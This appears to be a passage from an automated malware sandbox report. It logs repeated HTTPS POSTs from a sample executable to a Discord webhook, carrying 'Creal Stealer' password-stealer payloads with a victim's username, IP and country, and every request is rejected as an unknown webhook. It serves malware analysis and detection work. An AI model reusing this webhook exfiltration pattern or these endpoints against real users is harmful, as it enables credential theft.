                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC1353INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:48 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2d51653a7cec11efbc503afbab16203a; Expires=Wed, 26-Sep-2029 16:18:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453930
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sY%2Bjsb%2FW%2FfUaqsU7MA8A8TOSiqI00aN8mmv3uUl7Z4NFiAC1%2BNK1wnK%2F%2FPd%2FdhXw7SSi%2Fk1DrihQ%2FHh2pz6sd8bvu%2BrxZ7VE71oXmt4QCpyq10SZ%2FRvjqyPc%2FwGj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2d51653a7cec11efbc503afbab16203aa9b8cbaa67aebaf0008bcea960b22ff7f92bd80335a265625fda557de3aa0079; Expires=Wed, 26-Sep-2029 16:18:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=74796d8ae5164ae6da566c41aec5bf5b1d4c8013-1727453928; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 7a 4d 39 6a 36 58 4b 6b 55 78 44 55 41 58 48 69 72 67 64 76 65 6e 79 49 78 6f 77 64 73 35 51 70 4c 74 50 48 35 53 70 76 57 67 2d 31 37 32 37 34 35 33 39 32 38 36 33 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 63 64 61 38 34 62 34 33 61 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=QzM9j6XKkUxDUAXHirgdvenyIxowds5QpLtPH5SpvWg-1727453928633-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfcda84b43a0-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:48 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                8192.168.2.849715162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:49 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2db5f4c87cec11ef9f2fea3c9a69472c; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453930
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvXOxl5GduNF6QQBTn4VjDMmJuCct0yF7KCzgh1xZaHmMAlA9tURtileaYSYRVwsX0qVP875FsETEy%2Bc%2BbeBN6PJp4rorgwLZWLTT8EF7PNHYQs6DD7MeSu2NZZR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2db5f4c87cec11ef9f2fea3c9a69472c647c95a3107240db7e30f3e52fd1ce39c773bfe25bc2e7394de89af0e12b41ca; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 52 7a 54 6d 66 57 78 6f 56 52 42 67 4c 51 41 66 35 5f 2e 32 2e 35 68 6c 72 59 45 79 6d 52 56 32 70 46 6c 54 66 31 32 50 6c 63 30 2d 31 37 32 37 34 35 33 39 32 39 32 39 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 31 62 64 30 33 34 32 39 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=RzTmfWxoVRBgLQAf5_.2.5hlrYEymRV2pFlTf12Plc0-1727453929294-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfd1bd034291-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                9192.168.2.849716162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:49 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2dbb081e7cec11efa56b768b656d6a57; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453931
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tesq4q%2Fof5N%2FfOFagtamVLpkr6i9eeYF3bBeKAbDld1TyVPqX%2FHpV3t4la270yHU9z4nH4mjDEsQYdhSuHpvNeiOwxwIZDqBxVyhGAw0rfVPAivJJDrvTLEDPNPz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2dbb081e7cec11efa56b768b656d6a57312e2dc54f683e071f75ea25684146e12ad81c1e4d85666697e737dad60ad7b1; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 31 30 47 6f 54 55 75 58 4b 38 50 46 4f 6e 2e 45 59 53 5f 4d 48 66 58 6e 4b 67 52 4c 34 44 2e 31 71 71 52 7a 53 6b 53 58 38 6c 4d 2d 31 37 32 37 34 35 33 39 32 39 33 33 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 31 65 65 34 66 34 32 63 34 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=10GoTUuXK8PFOn.EYS_MHfXnKgRL4D.1qqRzSkSX8lM-1727453929331-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfd1ee4f42c4-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                10192.168.2.849718162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC1367INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:49 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2e1d43587cec11efaceb3afbab16203a; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453931
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1jcsZ632z4wAIayU2OyvV%2BxWivQLiijJaTylQFpILiWNmiohksX1E%2FSbLTnddCUoGmWYRI9Q%2FJCzEAlAhm2BPPucdNJ4fObq0OMSaVdmH%2BJBUtkDuGM5dQJghEC5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2e1d43587cec11efaceb3afbab16203a57f8b4487d16c7ea1e5af554e299d0a89a98c2725a43224f2fef5231ab51d425; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4b 71 33 62 52 57 72 4c 6b 73 73 71 5f 39 75 43 68 6a 78 4b 43 39 4b 34 47 43 56 33 6d 33 33 4c 4a 58 38 4c 31 67 35 66 52 51 6f 2d 31 37 32 37 34 35 33 39 32 39 39 36 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 64 35 66 38 66 39 34 31 61 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=Kq3bRWrLkssq_9uChjxKC9K4GCV3m33LJX8L1g5fRQo-1727453929969-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfd5f8f941a9-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                11192.168.2.849719162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:49 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:18:50 UTC1335INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:18:50 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=2e25bae27cec11efba92de6f7e04d91f; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 2
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453931
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFPou7Ly7EDyqnIeOmgLepZnN4qr4%2FDnPO4qKzS7fJE3FX8ptyTUiLopbsveCR1hjF3sctXpnzMhxRiXzJj324dOVk3J%2Fq%2BvE0y14AkezjGAdEjlI9ucHxkDN86d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=2e25bae27cec11efba92de6f7e04d91f7cc0110f1e71e2488bdd99cb271f4663c7c2ab2858b5b61a107ad4fd00dcf7ad; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
